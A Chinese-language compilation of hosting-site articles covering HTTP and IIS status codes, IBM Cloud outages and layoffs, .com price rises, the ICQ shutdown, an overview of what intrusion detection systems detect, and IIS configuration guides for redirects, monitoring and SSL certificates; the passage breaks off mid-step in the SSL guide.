请求被接受,但处理尚未完成。请求可能不一定会最终完成,有可能被处理过程随时中断,在这种情况下,没有办法在异步操作中重新发送状态代码。 202回应是没有义务的,这样做的目的是允许服务器不必等到用户代理和服务器间的连接结束,就可以响应其它过程的请求(象每天运行一次的,基于批处理的过程)。 在某些回应中返回的实体中包括当前请求的状态指示、状态监视器指针或用户对请求能否实现的评估信息。 204 No Content 服务器端已经实现了请求,但是没有返回新的信息。如果客户是用户代理,则勿需为此更新自身的文档视图。该回应主要是为了在不影响用户代理激活文档视图的前提下,进行script语句的输入及其它操作。该回应还可能包括新的、以实体标题形式表示的元信息,它可被当前用户代理激活视图中的文档所使用。 1.3 重定向(Redirection 3xx) 该类状态码表示用户代理要想完成请求,还需要发出进一步的操作。这些操作只有当后跟的请求是GET或HEAD时,才可由用户代理来实现,而不用与用户进行交互。用户代理永远也不要对请求进行5次以上的重定向操作,这样可能导致无限循环。 300 Multiple Choices 该状态码不被HTTP/1.0的应用程序直接使用,只是做为3xx类型回应的缺省解释。存在多个可用的被请求资源。 除非是HEAD请求,否则回应的实体中必须包括这些资源的字符列表及位置信息,由用户或用户代理来决定哪个是最适合的。 如果服务器有首选,它应将对应的URL信息存放在位置域(Location field)处,用户代理会根据此域的值来实现自动的重定向。 301 Moved Permanently 请求到的资源都会分配一个永久的URL,这样就可以在将来通过该URL来访问此资源。有编辑链接功能的客户端会尽可能地根据服务器端传回的新链接而自动更新请求URI。 新的URL必须由回应中的位置域指定。除非是HEAD请求,否则回应的实体主体 (Entity-Body)必须包括对新URL超链接的简要描述。 如果用POST方法发出请求,而接收到301回应状态码。在这种情况下,除非用户确认,否则用户代理不必自动重定向请求,因为这将导致改变已发出请求的环境。 注意:当在接收到301状态码后而自动重定向POST请求时,一些现存的用户代理会错误地将其改为GET请求。 302 Moved Temporarily 请求到的资源在一个不同的URL处临时保存。因为重定向有时会被更改,客户端应继续用请求URI来发出以后的请求。新的URL必须由回应中的位置域指定。除非是HEAD请求,否则回应的实体主体 (Entity-Body)必须包括对新URL超链接的简要描述。 如果用POST方法发出请求,而接收到302回应状态码。在这种情况下,除非用户确认,否则用户代理不必自动重定向请求,因为这将导致改变已发出请求的环境。 注意:当在接收到302状态码后而自动重定向POST请求时,一些现存的用户代理会错误地将其改为GET请求。 304 Not Modified 如果客户端成功执行了条件GET请求,而对应文件自If-Modified-Since域所指定的日期以来就没有更新过,服务器应当回应此状态码,而不是将实体主体发送给客户端。回应标题域中只应包括一些相关信息,比如缓存管理器、与实体最近更新(entity's Last-Modified)日期无关的修改。相关标题域的例子有:日期、服务器、过期时间。每当304回应中给出的域值发生变化,缓存都应当对缓存的实体进行更新。 1.4 客户端错误(Client Error )4xx 4xx类的状态码表示客户端发生错误。如果客户端在收到4xx代码时请求还没有完成,它应当立即终止向服务器发送数据。除了回应HEAD请求外,不论错误是临时的还是永久的,服务器端都必须在回应的实体中包含错误状态的解释。这些状态码适用于任何请求方法。 注意:如果客户端正在发送数据,服务器端的TCP实现应当小心,以确保客户端在关闭输入连接之前收到回应包。如果客户端在关闭后仍旧向服务器发送数据,服务器会给客户端发送一个复位包,清空客户端尚未处理的输入缓冲区,以终止HTTP应用程序的读取、解释活动。 400 非法请求(Bad Request) 如果请求的语法不对,服务器将无法理解。客户端在对该请求做出更改之前,不应再次向服务器重复发送该请求。 401 未授权(Unauthorized) 请求需要用户授权。回应中的WWW-Authenticate标题域(10.16节)应提示用户以授权方式请求资源。客户端应使用合适的授权标题域(10.2节)来重复该请求。如果请求中已经包括了授权信任信息,那回应的401表示此授权被拒绝。如果用户代理在多次尝试之后,回应一样还是返回401状态代码,用户应当察看一下回应的实体,因为在实体中会包括一些相关的动态信息。HTTP访问授权会在11节中解释。 403 禁止(Forbidden) 服务器理解请求,但是拒绝实现该请求。授权对此没有帮助,客户端应当停止重复发送此请求。如果不是用HEAD请求方法,而且服务器端愿意公布请求未被实现原因的前提下,服务器会将拒绝原因写在回应实体中。该状态码一般用于服务器端不想公布请求被拒绝的细节或没有其它的回应可用。 404 没有找到(Not Found) 服务器没有找到与请求URI相符的资源。404状态码并不指明状况是临时性的还是永久性的。如果服务器不希望为客户端提供这方面的信息,还回应403(禁止)状态码。 1.5 服务器错误(Server Error )5xx 回应代码以‘5’开头的状态码表示服务器端发现自己出现错误,不能继续执行请求。如果客户端在收到5xx状态码时,请求尚未完成,它应当立即停止向服务器发送数据。除了回应HEAD请求外,服务器应当在其回应实体中包括对错误情况的解释、并指明是临时性的还永久性的。 这类回应代码没有标题域,可适用于任何请求方法。 500 服务器内部错误(Internal Server Error) 服务器碰到了意外情况,使其无法继续回应请求。 501 未实现(Not Implemented) 服务器无法提供对请求中所要求功能的支持。如果服务器无法识别请求方法就会回应此状态代码,这意味着不能回应请求所要求的任何资源。 502 非法网关(Bad Gateway) 充当网关或代理的服务器从要发送请求的上游(upstream)服务器收到非法的回应。 503 服务不可用(Service Unavailable) 服务器当前无法处理请求。这一般是由于服务器临时性超载或维护引起的。该状态码暗示情况是暂时性的,要产生一些延迟。 注意:503状态码并没有暗示服务器在超载时一定要返回此状态码。一些服务器可能希望在超载时采用简单处理,即断掉连接。 IIS 错误代码大汇总 400 无法解析此请求。 401.1 未经授权:访问由于凭据无效被拒绝。 401.2 未经授权: 访问由于服务器配置倾向使用替代身份验证方法而被拒绝。 401.3 未经授权:访问由于 ACL 对所请求资源的设置被拒绝。 401.4 未经授权:Web 服务器上安装的筛选器授权失败。 401.5 未经授权:ISAPI/CGI 应用程序授权失败。 401.7 未经授权:由于 Web 服务器上的 URL 授权策略而拒绝访问。 403 禁止访问:访问被拒绝。 403.1 禁止访问:执行访问被拒绝。 403.2 禁止访问:读取访问被拒绝。 403.3 禁止访问:写入访问被拒绝。 403.4 禁止访问:需要使用 SSL 查看该资源。 403.5 禁止访问:需要使用 SSL 128 查看该资源。 403.6 禁止访问:客户端的 IP 地址被拒绝。 403.7 禁止访问:需要 SSL 客户端证书。 403.8 禁止访问:客户端的 DNS 名称被拒绝。 403.9 禁止访问:太多客户端试图连接到 Web 服务器。 403.10 禁止访问:Web 服务器配置为拒绝执行访问。 403.11 禁止访问:密码已更改。 403.12 禁止访问:服务器证书映射器拒绝了客户端证书访问。 403.13 禁止访问:客户端证书已在 Web 服务器上吊销。 403.14 禁止访问:在 Web 服务器上已拒绝目录列表。 403.15 禁止访问:Web 服务器已超过客户端访问许可证限制。 403.16 禁止访问:客户端证书格式错误或未被 Web 服务器信任。 403.17 禁止访问:客户端证书已经到期或者尚未生效。 403.18 禁止访问:无法在当前应用程序池中执行请求的 URL。 403.19 禁止访问:无法在该应用程序池中为客户端执行 CGI。 403.20 禁止访问:Passport 登录失败。 404 找不到文件或目录。 404.1 文件或目录未找到:网站无法在所请求的端口访问。 注意 404.1 错误只会出现在具有多个 IP 地址的计算机上。如果在特定 IP 地址/端口组合上收到客户端请求,而且没有将 IP 地址配置为在该特定的端口上侦听,则 IIS 返回 404.1 HTTP 错误。例如,如果一台计算机有两个 IP 地址,而只将其中一个 IP 地址配置为在端口 80 上侦听,则另一个 IP 地址从端口 80 收到的任何请求都将导致 IIS 返回 404.1 错误。只应在此服务级别设置该错误,因为只有当服务器上使用多个 IP 地址时才会将它返回给客户端。 404.2 文件或目录无法找到:锁定策略禁止该请求。 404.3 文件或目录无法找到:MIME 映射策略禁止该请求。 405 用于访问该页的 HTTP 动作未被许可。 406 客户端浏览器不接受所请求页面的 MIME 类型。 407 Web 服务器需要初始的代理验证。 410 文件已删除。 412 客户端设置的前提条件在 Web 服务器上评估时失败。 414 请求 URL 太大,因此在 Web 服务器上不接受该 URL。 500 服务器内部错误。 500.11 服务器错误:Web 服务器上的应用程序正在关闭。 500.12 服务器错误:Web 服务器上的应用程序正在重新启动。 500.13 服务器错误:Web 服务器太忙。 500.14 服务器错误:服务器上的无效应用程序配置。 500.15 服务器错误:不允许直接请求 GLOBAL.ASA。 500.16 服务器错误:UNC 授权凭据不正确。 500.17 服务器错误:URL 授权存储无法找到。 500.18 服务器错误:URL 授权存储无法打开。 500.19 服务器错误:该文件的数据在配置数据库中配置不正确。 500.20 服务器错误:URL 授权域无法找到。 500 100 内部服务器错误:ASP 错误。 501 标题值指定的配置没有执行。 502 Web 服务器作为网关或代理服务器时收到无效的响应。 #### IBM Cloud又全球性瘫痪啦:离上一次重大故障才过去五天! 这是短短七周内发生的第六次重大故障,这一回众多用户无法访问13种不幸中招的服务。  IBM的云近日遭遇另一个一级严重性(Severity One)的问题,IBM用这个等级来描述关键业务型系统无法正常使用的事件。这起事件始于5月25日协调世界时(UTC)14点54分 ,IBM第一时间给出的解释是“用户尝试访问列出的IBM云服务时可能会遇到连接问题”。华盛顿特区、大阪、伦敦、达拉斯、悉尼、东京和法兰克福等地的资源统统受到了影响。受到影响的还有13种云服务:Cloudant NoSQL DB、Code Engine(代码引擎)、Continuous Delivery-Toolchain(持续交付-工具链)、 DNS Services(DNS服务)、Event Streams(事件流)、 Hyper Protect Crypto Services(超级保护加密服务)、Hyper Protect Virtual Server(超级保护虚拟服务器)、Hyper Protect DBaaS、 IBM Cloud Shell、 IBM Watson Machine Learning(IBM沃森机器学习)、Mobile Foundation以及 IBM云端的MQ。IBM在5月26日UTC 01点05分发布的最新状态更新显示,Cloudant NoSQL DB、DNS服务、超级保护加密服务、IBM Cloud Shell和IBM沃森机器学习已恢复正常。从5月25日UTC 20点10分开始,其他服务陆续恢复。所有云都遇到过故障。上个周末,谷歌遇到了一起重大故障,当时报告“由于访问控制列表(ACL)的问题,多款谷歌云产品遇到了延迟时间变长及/或其他错误的情况,这种情况时断时续,共持续了10小时42分钟。”但是自4月3日以来,IBM至今已遇到了十个重大问题。IBM近期发生了一级严重性事件:•4月3日 •4月20日(两个毫不相关的问题同时发生) •4月26日 •5月20日 •5月25日 IBM的云在同一时间段内还遇到了四个二级严重性问题。鉴于IBM将业务重心放在了混合云上,自家云不断出现问题显然无法帮助其销售团队说服客户:蓝色巨人拥有帮助客户业务发展的能力。然而,这家公司仍在奋力前行,昨天还宣布了有意整合Ansible Collections和z/OS。IBM表示,这么做“将为新旧的IBM z/OS应用程序和来自Red Hat OpenShift容器平台的工作负载推动资源和服务自动化”。这样一来,那些工作负载应该更容易在混合云环境中运行。 #### IBM 发布简体中文字体“IBM Plex Sans SC” 开源免费商用 2 月 3 日消息,IBM 今天发布了全新的免费开源的简体中文字体“IBM Plex Sans SC”,可供下载并按照开放字体许可证(OFL)进行使用,有需要的用户可通过 GitHub 下载。 据介绍,“IBM Plex Sans SC”包含 29562 个字形,提供所有源文件和多种格式,以支持大多数印刷环境。 除了英文以及简体中文外,IBM Plex Sans 目前还支持扩展拉丁文、阿拉伯文、繁体中文、西里尔文、梵文、希腊文、希伯来文、日文、韩文和泰文。IBM 还提供了专用的数学字体。 Windows 安装字体 下载字体文件:从 Releases 页面下载最新的 zip 文件。 解压文件:将下载的 zip 文件解压到一个文件夹中。 安装字体: 打开“控制面板” > “外观和个性化” > “字体”。 将解压后的字体文件拖拽到字体窗口中,系统会自动安装。 macOS 安装字体 下载字体文件:从 Releases 页面下载最新的 zip 文件。 解压文件:将下载的 zip 文件解压到一个文件夹中。 安装字体: 打开“访达” > “应用程序” > “字体册”。 点击“+”按钮,选择解压后的字体文件进行安装。 Linux 安装字体 下载字体文件:从 Releases 页面下载最新的 zip 文件。 解压文件:将下载的 zip 文件解压到一个文件夹中。 安装字体: 打开终端,导航到解压后的文件夹。 使用以下命令安装字体:mkdir -p ~/fontscp *ttf ~/fonts/fc-cache -fv #### IBM云服务出现故障 导致全球多个客户网站瘫痪 6月10日 消息:太平洋时间 6 月 9 日下午,IBM Cloud的用户报告了一次故障,导致全球许多网站没有响应,目前该问题已经解决。 由于IBM 自己的状态页面也托管在IBM Cloud 上,页面提示发生了内部服务器错误。 据zdnet报道,截止 6 月 9 日 16:20 ,该页面尚未恢复,给出的提示为:“抱歉,我们这边遇到了一个错误,我们的开发人员正在努力解决这个问题。 请尝试重新加载该页面或跟随这些链接返回。” 发生故障后,IBM官方并未第一时间作出说明,但 DownDetector 显示 IBM Cloud 用户从下午 14:30 左右就开始报告问题。 IBM 旗下的混合云业务部门 IBM Aspera在当天下午三点多反馈称,收到了影响所有地区的服务中断的警报,工程师目前正在调查此事件,并将在有更多信息时提供更新。 根据Aspera的说法,在阿姆斯特丹、达拉斯、法兰克福、墨尔本和多伦多等地区,AoC管理存储正遭受“重大停机”。此外,东京、华盛顿、米兰等全球二十多个大城市IBM 云转移集群也被列为遭受重大故障的地区。 据报道,IBM Aspera API服务已经可以运行。与此同时,IBM Cloud的客户表示,他们已被告知此次故障。 IBM Cloud 在 Twitter 告诉用户它知道已报告的故障,并且正在调查此事。到了18:30,IBM 才发布声明称,“今天早些时候报告的 IBM Cloud 服务中断目前正在恢复中,我们致力于尽快恢复全部服务。” #### IBM关闭中国研发部门 1000多名员工被裁 8月26日 消息:8月23日,IBM中国区对1000多名研发和测试岗位员工突然关闭了内网访问权限,引发外界对其可能进行大规模裁员的猜测。 三天后,即8月26日,IBM中国向媒体证实,公司将关闭在中国的研发部门,包括IBM中国开发中心(CDL)和IBM中国系统中心(CSL),这些部门主要承担研发和测试任务。 据悉,受影响的员工将获得N+3的赔偿方案。有业界消息指出,IBM的核心研发工作多年前已全部转移到美国,中国研究院在2021年已经关闭,目前在中国的业务主要是测试而非研发。 IBM自1984年进入中国市场,至今已有40年历史。IBM亚太区总经理Hans Dekkers近期还表示,希望IBM在未来40年甚至更长时间内继续在中国发展。 结果说这话还没过几天就把中国员工裁了,老外说话果然没什么诚信。 #### ICANN允许.com域名涨价 或致COM域名新一轮的涨价 ICANN 允许 Verisign 在2020-2023这4年间,每年涨价7%,停两年,再开始一个循环,再2026-2029年之间,再以每年7%的涨幅涨价4年。这样,到2030年,域名注册商每卖出一个域名,就要给 Verisign 13.49 美金,涨幅 71.8%。当前全世界有超过 1.4 亿 .com 域名,这一涨价意味着Verisign轻松增加了5亿美元的收入。 域名注册商对此表达了不满。域名注册商每次代表客户注册一个 .com 域名都需要向 Verisign 公司支付 7.85 美元,注册商通常会在这个费用基础上向客户多收几美元的注册费,由于竞争激烈,收费的余地很小。 但 Verisign 没有竞争对手,如果你想要代理 .com 域名注册,你必须和 Verisign 打交道。为了防止 Verisign 滥用垄断,ICANN 对费用设定了上限。现在,ICANN 允许价格每年上涨 7%——这比预期通货膨胀要高得多。(表达异议地址) 扩展阅读:互联网名称与数字地址分配机构是一个非营利性的国际组织,成立于1998年10月,是一个集合了全球网络界商业、技术及学术各领域专家的非营利性国际组织,负责在全球范围内对互联网唯一标识符系统及其安全稳定的运营进行协调,包括互联网协议(IP)地址的空间分配、协议标识符的指派、通用顶级域名(gTLD)以及国家和地区顶级域名(ccTLD)系统的管理、以及根服务器系统的管理。这些服务最初是在美国政府合同下由互联网号码分配当局(Internet Assigned Numbers Authority,IANA)以及其它一些组织提供。 #### ICANN批准Verisign的合同,未来四年.com域名每年涨价7% 4月2日 消息:据Register报道,域名系统监督机构ICANN批准了Verisign的 .com运营合同延长之后,互联网顶级域名的价格在未来四年将一路稳步上涨。 据悉,一个.com的批发价是7. 85 美元。从 2021 年开始,到 2024 年合同到期,这一价格每年将增加7%,最终为10. 29 美元,为网络运营商Verisign带来数亿美元的纯利润。Verisign在过去 20 年里一直运营着 .com注册中心。受该消息影响,Verisign的股价大涨了7%。 在美国政府与Verisign公司直接谈判并于 2018 年通过公告告知ICANN后,ICANN认为除了批准新合同,它别无选择。新合同涉及数百万个网络域名的管理。尽管美国政府不再直接监管ICANN,但它对域名系统仍有重大影响,而.com合同就是其中之一。 不过人们对ICANN在DNS领域的管理产生了更多的疑问。该组织不仅利用其独特的地位,从Verisign那里获得 2000 万美元作为续签合同的回报。实际上忽视了自己的公开评论过程,暴露出其对其所监管的数十亿美元市场的无知。 据悉,ICANN收到了超过 9000 条关于合同续签的公众评论,该组织在总结公众反馈时显示,95%的人明确反对涨价。尽管如此,并不能改变续签涨价的结果。 目前市场已有超过1. 4500 亿个.com域名,虽然有一个健康的二级市场,但它只占了现有域名的一小部分。绝大多数.com持有者是由个人或公司持有的,而在这份合同续签后,他们将不得不支付多得多的费用。 Verisign垄断了.com域名的注册,其12. 3 亿美元的年收入中,有93%来自.com销售。行业专家表示,由于互联网注册机构的规模化运作,Verisign运营注册管理机构的成本逐年下降。该业务在互联网公司的利润率已至少达到50%,任何价格上涨几乎都将是纯利润。 #### ICQ 即时聊天软件将于6 月 26 日关闭 5 月 25 日消息,ICQ 即时聊天软件官方宣布将于 2024 年 6 月 26 日关闭,在上线运营近 28 年之后走向终结。 ICQ是由以色列公司Mirabilis于1996年11月16日推出的即时通讯软件,后被美国在线(AOL)收购。巅峰时期ICQ 风靡全球,超过 1 亿用户用它来协调计划、畅聊生活或在玩网络游戏时进行交流。 ICQ 是 I Seek You 的连音缩写,中文可以翻译为我寻找你。 ICQ与QQ渊源颇深,QQ 早期叫做 OICQ 就是模仿 ICQ,O 是 opening 的缩写,代表开放的 ICQ,腾讯公司在1999年注册了oicq.com和oicq.net这两个域名,由于这两个域名中含有“ICQ”,美国在线(AOL)认为这侵犯了他们的知识产权。 2000年3月21日,仲裁员詹姆士·A·卡莫迪签署了仲裁判决书,判定将这两个域名归还给美国在线。腾讯公司不得不放弃这两个域名,并在之后将OICQ更名为QQ,以避免进一步的法律纠纷。 全盛时期,ICQ 平台上的用户超过 1 亿,这在当时是一项了不起的成就。2010 年,ICQ 被 Mail.ru(即现在的 VK)收购,此后随着产品使用量的下降,ICQ 一直归后者所有。 页面显示服务将于 6 月 26 日关闭,并建议用户改用 VK Messenger 和 Workspace。 #### IDC评述网疑似关站 连续几周无法访问 IDC行业知名交流平台“IDC评述网”疑似关站,网站连续几周无法访问,百度收录被清零。 目前极可能关站跑路了,主机吧查询后发现域名的备案没有了,而且域名也解析至美国IP IDC评述网是一个老牌的IDC排名导购网站,网站域名已经有12年历史。以前很多IDC厂商都喜欢跑上面推广,连主机吧也在上面推广过,很多站长公司都喜欢在上面找服务商,由于是开放似评论的,所以上面的差评也很多,总得来说IDC评述网还是非常公正的。 之所以关站应该国内IDC环境已经大不如前了,很多中小IDC服务商都已经倒闭了,要么转型了,而大厂如阿里、腾讯、华为这些根本不需要在评述网打广告,这也就导致这些靠吃广告费的网站面临倒闭,IDC评述网关闭只是早晚的事了。   #### ids设备可以防护哪些攻击 IDS(入侵检测系统)是一种主动监控网络流量或系统活动的安全设备,主要用于识别和报警潜在的攻击行为。其防护范围涵盖多种攻击类型,以下是IDS设备能够检测和防护的主要攻击类别及其原理: 1. 扫描探测类攻击 端口扫描:攻击者通过扫描目标主机的开放端口以寻找潜在漏洞。IDS通过检测异常的连接请求频率或模式(如大量短时间内的TCP SYN请求)进行识别。 网络映射:例如使用ICMP Ping扫描探测网络拓扑,IDS可通过协议分析和流量基线比对发现异常。 2. 拒绝服务攻击(DoS/DDoS) 流量泛洪:如UDP泛洪、ICMP泛洪等,IDS通过流量统计分析检测超出正常阈值的流量,并触发警报。 应用层DoS:例如HTTP GET泛洪,IDS结合协议深度分析识别异常请求频率。 3. 恶意软件传播 病毒、蠕虫、木马:基于特征库(签名)匹配已知恶意代码的传输行为,如文件头部特征或通信模式。 勒索软件与后门程序:通过行为分析检测异常文件操作(如大量文件加密)或隐蔽通信通道的建立。 4. 应用层攻击 SQL注入:检测HTTP请求中异常的SQL语句结构或关键字,阻止数据库漏洞利用。 跨站脚本(XSS):分析Web请求中的脚本标签或恶意代码片段。 缓冲区溢出:通过协议分析识别异常长度的数据包或载荷。 5. 内部威胁与横向渗透 未授权访问:监控用户登录行为或权限变更,识别异常账号活动(如非工作时间访问敏感资源)。 数据泄露:检测异常数据传输(如大量文件外传)或隐蔽隧道通信(如DNS隧道)。 6. 协议异常与欺骗攻击 ARP欺骗:检测局域网内异常的ARP广播包。 TCP会话劫持:通过状态跟踪识别非法的TCP序列号或会话重置。 7. 零日攻击(部分防护) 基于异常检测:通过建立正常网络行为基线,发现未知攻击模式(如新型漏洞利用行为)。 沙箱联动:部分高级IDS可与沙箱结合,通过隔离分析可疑文件判断是否为恶意载荷。 IDS的局限性 尽管IDS能检测多种攻击,但其被动监控特性决定了它无法直接阻断攻击(需依赖防火墙或IPS联动)。此外,误报(如正常流量被误判为攻击)和漏报(如变种攻击绕过特征库)是常见问题。为提升防护效果,建议将IDS与IPS、防火墙等设备协同部署,形成纵深防御体系。 如需进一步了解特定攻击的检测机制或配置方案,可参考相关技术文档或厂商指南。 #### IE浏览器被放弃了:微软禁用TLS 1.0/1.1安全协议 早在2018年,微软就曾计划逐步淘汰WebView的TLS 1.0/1.1,但由于各种客观原因,这一计划被不断推迟。 近日,微软公布了系统的后续更新计划,终于宣布将于9月13日在IE和旧版Edge中禁用TLS 1.0/1.1这一过时的安全协议。 不过,微软也意识到了直接一刀切”式的禁用会出现问题,因此并没有彻底禁用TLS 1.0/1.1,需要使用的用户可以通过组策略,或在IE中的工具-Internet选项-高级中重新启用。 此外,目前基于Chromium内核的Edge浏览器已经在84版本中完成了TLS 1.0和1.1的禁用,因此这一调整实际上不会对大部分用户造成明显的影响。 此次微软宣布禁用TLS 1.0/1.1,很大程度上是因为这两种安全协议已经很难胜任现在的网络环境。 作为分别在1996年与2006年发布的协议,TLS 1.0/1.1使用的是弱加密算法和系统,存在重大安全漏洞,容易受到降级攻击的严重影响。 #### IE浏览器要彻底停止了 3月18日消息:据Softpedia报道,我们已经知道IE浏览器将在今年被淘汰,但微软想确保每个人都知道它的退役日期正在临近。 图片来自Microsoft 微软公司在Windows消息中心发布了一个新的警告,专门提醒用户IE浏览器将在今年6月退役,并强调Microsoft Edge包含一个专门的IE模式,专门为兼容目的而整合。换句话说,虽然IE将不再作为一个独立的应用程序存在,但它将作为Microsoft Edge功能的一部分继续存在。 微软表示:「正如之前所宣布的,Windows上IE浏览器未来将整合进Microsoft Edge中。Internet Explorer模式(IE模式)在Microsoft Edge内提供传统的旧版浏览器支持。正因为如此,Internet Explorer11(IE11)桌面应用程序将于2022年6月15日退役。这意味着IE11桌面应用程序将不再被支持,之后如果用户试图访问它,将重定向到Microsoft Edge」。 与此同时,微软Edge的市场份额正在迅速增加,因为它现在是Windows的默认浏览器。微软Edge也是一个跨平台的浏览器,所以除了Windows10和Windows11之外,它也可以在其他操作系统上使用,不仅包括Mac和Linux,还包括安卓和iOS。 如果IE浏览器停止的话,不知道国内银行用的IE能否正常用呢?之前主机吧去工商银行的机器上操作的时候,已经使用IE浏览器进不了网银了。 #### IIS 7、8启用nginx代理后日志中如何获取访客真实IP方法 服务器安装了安全软件会导致获取真实ip日志dll运行异常,导致无法成功获取真实ip地址. 所需的步骤取决于您的IIS版本。此操作适用iis7之上版本。 1、下载插件F5XForwardedFor.dll:http://download.west263.net/iis7-rewrite%E6%8F%92%E4%BB%B6/x_forwarded_for.rar 2、根据自己的版本将x86\Release 或者x64\Release目录下的F5XForwardedFor.dll拷贝到某个目录,假设为C:\F5XForwardedFor\,确保对IIS进程对该目录有读取权限。 3、确认您的服务器是否安装以下两个模块:(“ISAPI筛选器” 及 “ISAPI和CGI限制” ):如果未安装,请按以下步骤进行安装: 4、添加“ISAPI筛选器”,双击“ISAPI筛选器”,点击添加: 5、填写筛选器的名称(没无特殊要求),选报DLL文件路径,点击确定。 6、双击“ISAPI 和CGI限制”,点击添加,添加内容如下: 7、修改添加的DLL,从“不允许”修改为“允许”。 8、重启IIS服务器,等待配置生效。 #### IIS7服务器实现301永久重定向 购买WIN型虚拟主机的用户,有的会发现主机控制面板中301重定向是灰色的点不了,这是因为您所使用的WIN主机是IIS7环境的,无法通过控制面板来设置,那怎么办呢?IIS7主机都可以通过网站根目录创建web.config文件添加301重定向代码即可实现了。具体代码如下web.config: <?xml version="1.0" encoding="UTF-8"?> <configuration> <system.webServer> <rewrite> <rules> <rule name="Canonical Host Name" stopProcessing="true"> <match url="(.*)" /> <conditions> <add input="{HTTP_HOST}" pattern="^sudu\.cn$" /> </conditions> <action type="Redirect" url="http://zhujib.com/{R:1}" redirectType="Permanent" /> </rule> </rules> </rewrite> </system.webServer> </configuration> 把代码中的域名zhujib.com换成您自己的域名就可以了。 #### IISMonitor:可监测网页是否正常并自动重启IIS 1、工具简介 IISMonitor 用于网页监测及IIS自动重启,能定时监测网页是否有效,如果无效则自动重启IIS,还是无效则自动重启电脑,从而使网站恢复运行。对于不明原因的IIS假死、IIS卡顿,重启后又能恢复的场合比较有用。 主要特点:各项监测参数可按需设置,具有Email通知功能,能作为Windows服务开机自动启动。本工具系绿色软件、无需安装,下载后解压出来,后双击其中的IISMonitor.exe即可运行。由于需要重启IIS、重启电脑,因此IISMonitor需要在IIS服务器端运行。 需要说明的是,重启IIS使之恢复运行,是一种临时措施,是不得已而采取的补救办法。彻底的解决办法,还是要分析解决系统或程序存在的问题。 2、工作流程 默认的监测与重启流程是:每10秒钟访问一次被监测网页;连续2次网页访问失败(返回的状态码不等于200),视作IIS异常,就自动重启IIS;IIS连续重启2次后网页仍然失效,视作IIS重启无效,继而自动重启电脑;电脑重启后继续监测,连续重启电脑2次后网页仍然失效,就放弃监测,并发送通知,转由人工处理。 默认设置可按需调整,包括:被监测网页的网址、监测频度、IIS重启命令行、IIS重启触发条件、电脑重启命令行、电脑重启触发条件等。 监测过程中,IISMonitor能记录事件日志,包括:事件发生时间、事件类型、相关参数等,可供后期参考。各事件发生时,可自动发送Email通知,让你及时了解监测情况。 3、操作界面及参数设置 IISMonitor的操作界面如下图所示: 各参数设置的含义如下: (1)如何监测与重启(Settings - How to Monitor) 可指定网页网址、监测频度,如何重启IIS,如何重启电脑,以及重启的触发条件等。 Page URL to Check:需要监测的网页网址,默认值:http://localhost。 Page Check Interval:网页监测时间间隔,默认值:10秒。 IIS Reset Command:重启IIS的命令行,默认值:iisreset /restart。 IIS Reset Trigger:重启IIS的触发条件,默认值:启用,连续2次网页访问失败。 Computer Reset Command:重启电脑的命令行,默认值:shutdown.exe -r。 Computer Reset Trigger:重启电脑的触发条件,默认值:启用,连续2次重启IIS后网页仍然失效。 Abort Monitor Trigger:放弃监测的触发条件,默认值:启用,连续2次重启电脑后网页仍然失效。 (2)如何提醒通知(Settings - Email Notice) 此部分定义如何发送Email通知,包括:哪些事件需要通知,发送给谁,用哪个账号发送等。 Events to Notify:哪些事件需要通知,默认值:IIS重启、电脑重启、放弃监测均通知。 Email of Rceiver:收件人的Email地址。 Email of Sender:发件账号的Email地址。 SMTP Server of Sender:发件账号的SMTP服务器网址。 Account of Sender::发件账号的登录账号。 Password of Sender:发件账号的登录密码。 (3)监测状态信息(Status -Monitor Actions) 此部分显示监测状态信息,包括:监测开始时间、页面监测次数、IIS重启次数、电脑重启次数等,底行为当前工作指令及状态。 Time of Start Monitor:开始监测的时间。 Count of Page Check:页面已监测次数。 Count of IIS Reset:IIS已重启次数。 Count of Computer Reset:电脑已重启次数。 4、如何实现电脑重启后继续监测 启动监测后,本软件关闭重启后能自动恢复监测,无需人工干预。但如果重启的是电脑,IISMonitor未开机启动的话,监测就会中断。为此,可将IISMonitor设置成开机自动启动,使得监测持续不断。有两种设置方法,步骤如下: 一是将IISMonitor列入开机启动目录,以前台的方式自动运行。具体步骤:开始→所有程序→启动→鼠标右键→浏览,进入启动程序目录→在空白处点鼠标右键→新建→快捷方式→浏览→选择本软件IISMonitor.exe。此后,每当电脑开机重启时,IISMonitor就会前台自动运行,能看到操作界面及运行状态。 二是将IISMonitor转化为Windows服务,以后台的方式自动运行。具体步骤:进入IISMonitor目录下的Service子目录,双击批处理程序AddIISMonitorService.bat,就会将IISMonitor转化为一个名为IISMonitor的Windows服务。此后,每当电脑开机重启时,该服务就会后台自动运行,但看不到操作界面及运行状态。如果不需要该服务,也可卸载,具体步骤:先停止该服务,再进入Service子目录,双击RemoveIISMonitorService.bat,就会卸载该服务。 启停IISMonitor服务的位置:控制面板→管理工具→服务→IISMonitor→右键→按需选择启动、停止或自动启动。 5、下载网址 http://www.hc-software.com/hcgis/support/IISMonitor.zip #### IIS服务器部署https(SSL)证书的方法 给服务器配置https证书(即SSL证书),就可以实现https安全访问。下面介绍了在IIS服务器配置https证书的方法。 一、前提条件 1)已安装IIS服务器,且您的IIS服务器上已经开启了443端口(HTTPS服务的默认端口)。 2)已安装OpenSSL工具。 3)已下载IIS服务器所需要的证书文件。 4)在配置之前可以在CA机构申请一张合适的SSL证书。 注:申请证书时需要选择系统自动创建CSR,如果选择手动创建CSR,则不会生成证书文件。您需要选择其他服务器下载.crt证书文件后,使用openssl命令将.crt文件的证书转换成.pfx格式。 二、操作步骤 1、解压已下载保存到本地的IIS证书文件。 您将看到文件中有一个证书文件(以.pfx为后缀或文件类型)和一个密钥文件(以.txt为后缀或文件类型)。 注:每次下载证书都会产生新的密码,该密码仅匹配本次下载的证书。如果需要更新证书文件,同时也要更新匹配的密码文件。 2、在IIS服务器控制台中导入您解压的IIS证书文件。 1)在安装IIS服务器的Windows系统中,单击开始 > 运行 > MMC打开控制台。 2)单击文件 > 添加/删除管理单元打开添加/删除管理单元对话框。 3)在可用的管理单元列表中选择证书,单击添加选择计算机账户。然后单击下一步完成本地计算机(运行此控制台的计算机)的选择。 4)在控制台左侧导航栏单击控制台根节点下的证书打开证书树形列表。 5)在个人右键菜单中选择所有任务 > 导入,打开证书导入向导对话框,并单击下一步。 6)在要导入的文件页面单击浏览导入下载的PFX格式证书文件,并单击下一步。 注:在导入证书文件时,文件名右侧文件类型列表中请选择所有文件类型。 7)输入证书密钥文件里的密码,并单击下一步。 您可在下载的IIS证书文件中打开pfx-password .txt文件查看证书密码。 8)选择根据证书类型,自动选择证书存储并单击下一步完成证书的导入。 3、分配服务器证书。 